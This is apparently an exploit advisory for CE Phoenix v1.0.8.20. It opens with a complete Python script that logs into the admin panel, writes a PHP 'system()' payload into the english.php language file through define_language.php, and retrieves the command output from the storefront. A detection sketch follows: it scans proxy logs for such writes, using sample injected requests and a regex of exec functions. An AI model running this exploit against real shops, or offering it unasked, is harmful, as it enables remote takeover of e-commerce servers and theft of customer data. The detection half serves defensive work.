## Exploit Title: CE Phoenix v1.0.8.20 - Remote Code Execution (RCE) (Authenticated)
#### Date: 2023-11-25
#### Exploit Author: tmrswrr
#### Category: Webapps
#### Vendor Homepage: [CE Phoenix](https://phoenixcart.org/)
#### Version: v1.0.8.20
#### Tested on: [Softaculous Demo - CE Phoenix](https://www.softaculous.com/apps/ecommerce/CE_Phoenix)

## EXPLOIT:

```python
import requests
from bs4 import BeautifulSoup
import sys
import urllib.parse
import random
from time import sleep


class colors:
    OKBLUE = '\033[94m'
    WARNING = '\033[93m'
    FAIL = '\033[91m'
    ENDC = '\033[0m'
    BOLD = '\033[1m'
    UNDERLINE = '\033[4m'
    CBLACK = '\33[30m'
    CRED = '\33[31m'
    CGREEN = '\33[32m'
    CYELLOW = '\33[33m'
    CBLUE = '\33[34m'
    CVIOLET = '\33[35m'
    CBEIGE = '\33[36m'
    CWHITE = '\33[37m'


def entry_banner():
    color_random = [colors.CBLUE, colors.CVIOLET, colors.CWHITE, colors.OKBLUE,
                    colors.CGREEN, colors.WARNING, colors.CRED, colors.CBEIGE]
    random.shuffle(color_random)
    banner = color_random[0] + """
    CE Phoenix v1.0.8.20 - Remote Code Execution \n Author: tmrswrr
    """
    for char in banner:
        print(char, end='')
        sys.stdout.flush()
        sleep(0.0045)


def get_formid_and_cookies(session, url):
    # The admin forms carry a per-session 'formid' token; read it from the page
    # so the subsequent POSTs are accepted.
    response = session.get(url, allow_redirects=True)
    if response.ok:
        soup = BeautifulSoup(response.text, 'html.parser')
        formid_input = soup.find('input', {'name': 'formid'})
        if formid_input:
            return formid_input['value'], session.cookies
    return None, None


def perform_exploit(session, url, username, password, command):
    print("\n[+] Attempting to exploit the target...")
    initial_url = url + "/admin/define_language.php?lngdir=english&filename=english.php"
    formid, cookies = get_formid_and_cookies(session, initial_url)
    if not formid:
        print("[-] Failed to retrieve initial formid.")
        return

    # Login
    print("[+] Performing login...")
    login_payload = {
        'formid': formid,
        'username': username,
        'password': password
    }
    login_headers = {
        'Content-Type': 'application/x-www-form-urlencoded',
        'Cookie': f'cepcAdminID={cookies["cepcAdminID"]}',
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36',
        'Referer': initial_url
    }
    login_url = url + "/admin/login.php?action=process"
    login_response = session.post(login_url, data=login_payload, headers=login_headers, allow_redirects=True)
    if not login_response.ok:
        print("[-] Login failed.")
        print(login_response.text)
        return
    print("[+] Login successful.")

    # A fresh formid is issued after authentication; fetch it before saving.
    new_formid, _ = get_formid_and_cookies(session, login_response.url)
    if not new_formid:
        print("[-] Failed to retrieve new formid after login.")
        return

    # Exploit
    print("[+] Executing the exploit...")
    encoded_command = urllib.parse.quote_plus(command)
    exploit_payload = f"formid={new_formid}&file_contents=%3C%3Fphp+echo+system%28%27{encoded_command}%27%29%3B"
    exploit_headers = {
        'Content-Type': 'application/x-www-form-urlencoded',
        'Cookie': f'cepcAdminID={cookies["cepcAdminID"]}',
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36',
        'Referer': login_response.url
    }
    exploit_url = url + "/admin/define_language.php?lngdir=english&filename=english.php&action=save"
    exploit_response = session.post(exploit_url, data=exploit_payload, headers=exploit_headers, allow_redirects=True)
    if exploit_response.ok:
        print("[+] Exploit executed successfully.")
    else:
        print("[-] Exploit failed.")
        print(exploit_response.text)

    # The overwritten language file is included on every storefront page,
    # so a plain GET of the site returns the command output.
    final_response = session.get(url)
    print("\n[+] Executed Command Output:\n")
    print(final_response.text)


def main(base_url, username, password, command):
    print("\n[+] Starting the exploitation process...")
    session = requests.Session()
    perform_exploit(session, base_url, username, password, command)


if __name__ == "__main__":
    entry_banner()
    if len(sys.argv) < 5:
        print("Usage: python script.py [URL] [username] [password] [command]")
        sys.exit(1)
    base_url = sys.argv[1]
    username = sys.argv[2]
    password = sys.argv[3]
    command = sys.argv[4]
    main(base_url, username, password, command)
```
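The request the script sends is a normal admin action (saving a language file through `define_language.php?...&action=save`), so the observable difference between legitimate use and abuse is what ends up in the `file_contents` field. The following detection sketch is an added example, not part of the advisory or of CE Phoenix; it runs over constructed JSON request records from a hypothetical body-logging reverse proxy (the field names `ts`, `src`, `method`, `path`, `query`, `body` are an assumption), records every language-file save as an auditable event, and raises the severity when the saved contents contain a command-execution or `eval` call. A plain `<?php` tag is deliberately not the trigger, since the language files the editor manages are themselves PHP.

```python
"""Detection sketch for PHP-command injection via the CE Phoenix admin
language-file editor (added example; assumes a proxy that logs POST bodies)."""
import json
import re
import urllib.parse

# Constructed sample log lines (one JSON object per request). The schema is a
# hypothetical one; adapt the field names to your proxy or WAF.
SAMPLE_LOG = """\
{"ts":"2023-11-25T10:00:01Z","src":"203.0.113.5","method":"GET","path":"/admin/define_language.php","query":"lngdir=english&filename=english.php","body":""}
{"ts":"2023-11-25T10:00:02Z","src":"203.0.113.5","method":"POST","path":"/admin/login.php","query":"action=process","body":"formid=abc123&username=admin&password=REDACTED"}
{"ts":"2023-11-25T10:00:03Z","src":"203.0.113.5","method":"POST","path":"/admin/define_language.php","query":"lngdir=english&filename=english.php&action=save","body":"formid=def456&file_contents=%3C%3Fphp+echo+system%28%27id%27%29%3B"}
{"ts":"2023-11-25T10:05:00Z","src":"198.51.100.7","method":"POST","path":"/admin/define_language.php","query":"lngdir=english&filename=english.php&action=save","body":"formid=ghi789&file_contents=%3C%3Fphp%0Adefine%28%27HEADER_TITLE_TOP%27%2C+%27Top%27%29%3B"}
"""

# Calls that hand string content to the shell or the PHP interpreter. A
# language file that consists of define() statements never needs these.
EXEC_CALL_RE = re.compile(
    r"\b(system|exec|shell_exec|passthru|popen|proc_open|eval)\s*\(",
    re.IGNORECASE,
)


def is_language_file_write(entry):
    """True for a POST that saves a file through the admin language editor."""
    if entry.get("method") != "POST":
        return False
    if not entry.get("path", "").endswith("/admin/define_language.php"):
        return False
    query = urllib.parse.parse_qs(entry.get("query", ""))
    return query.get("action") == ["save"]


def saved_file_contents(body):
    """Decode the form body and return the file_contents field as text."""
    fields = urllib.parse.parse_qs(body, keep_blank_values=True)
    return fields.get("file_contents", [""])[0]


def scan_log(text):
    """Return one finding per language-file save. Severity is 'alert' when the
    saved contents contain an execution/eval call, otherwise 'audit'."""
    findings = []
    for line in text.splitlines():
        if not line.strip():
            continue
        entry = json.loads(line)
        if not is_language_file_write(entry):
            continue
        contents = saved_file_contents(entry.get("body", ""))
        severity = "alert" if EXEC_CALL_RE.search(contents) else "audit"
        findings.append({
            "ts": entry["ts"],
            "src": entry["src"],
            "severity": severity,
            "contents": contents,
        })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"[{f['severity'].upper()}] {f['ts']} {f['src']} "
              f"saved language file: {f['contents']!r}")
```

On the sample above the scanner reports the `system('id')` write from 203.0.113.5 as an alert and the ordinary `define()` edit from 198.51.100.7 as an audit record only. In a deployment without body logging, the same signal is available on the host side by watching the language files under the web root for writes that introduce these function names.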